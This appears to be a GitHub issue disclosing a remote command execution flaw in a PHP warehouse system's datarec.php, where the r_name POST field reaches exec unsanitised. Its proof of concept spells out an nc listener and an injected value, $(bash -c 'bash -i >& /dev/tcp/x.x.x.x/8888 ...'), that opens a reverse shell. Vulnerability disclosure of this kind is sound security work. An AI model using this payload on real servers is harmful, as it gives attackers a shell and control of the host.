Remote Command Execution vulnerability in /wms/src/system/datarec.php

A RCE was found in system/datarec.php, the `$_POST[r_name]` is directly passed into the $mysqlstr, and is executed by exec, which causing a RCE.

![2U7JWGK7X(EZH(N$FE%H52P](https://user-images.githubusercontent.com/51911561/137783442-04ded066-a038-49d7-ba06-d4fb1629e70f.png)

POC:
Firstly, start a nc listener:
![U0 }2 ZX_1W3~R5`VW(VZ@D](https://user-images.githubusercontent.com/51911561/137783514-86c6dd2b-33bb-4f9b-bbae-23947bea15b2.png)

Next, post a request with parameter:
r_name=$(bash -c 'bash -i >& /dev/tcp/x.x.x.x/8888 0<&1 2>&1')
![CEJ17J 7`ZUFTTE}INOM$RG](https://user-images.githubusercontent.com/51911561/137783531-d93f4052-8e7a-4c3c-98d0-2b6f5ff34ee2.png)

Finally, you get the reverse shell:
![HRVEDK)LA`%4_BC5ELHJ0QY](https://user-images.githubusercontent.com/51911561/137783547-7892ab00-db89-4dc5-a160-702db6171923.png)


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Remote Command Execution vulnerability in /wms/src/system/datarec.php #12

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development